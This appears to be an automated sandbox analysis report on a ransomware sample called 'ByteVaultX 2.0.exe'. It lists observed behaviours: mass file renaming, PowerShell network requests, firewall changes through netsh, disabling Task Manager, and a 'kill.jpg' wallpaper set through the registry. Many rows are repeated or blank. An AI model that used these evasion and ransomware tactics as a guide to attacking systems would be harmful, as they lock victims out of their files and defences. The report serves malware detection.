"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

Signatures

Renames multiple (156) files with added filename extension

ransomware

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Disables Task Manager via registry modification

evasion

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" N/A N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings N/A N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
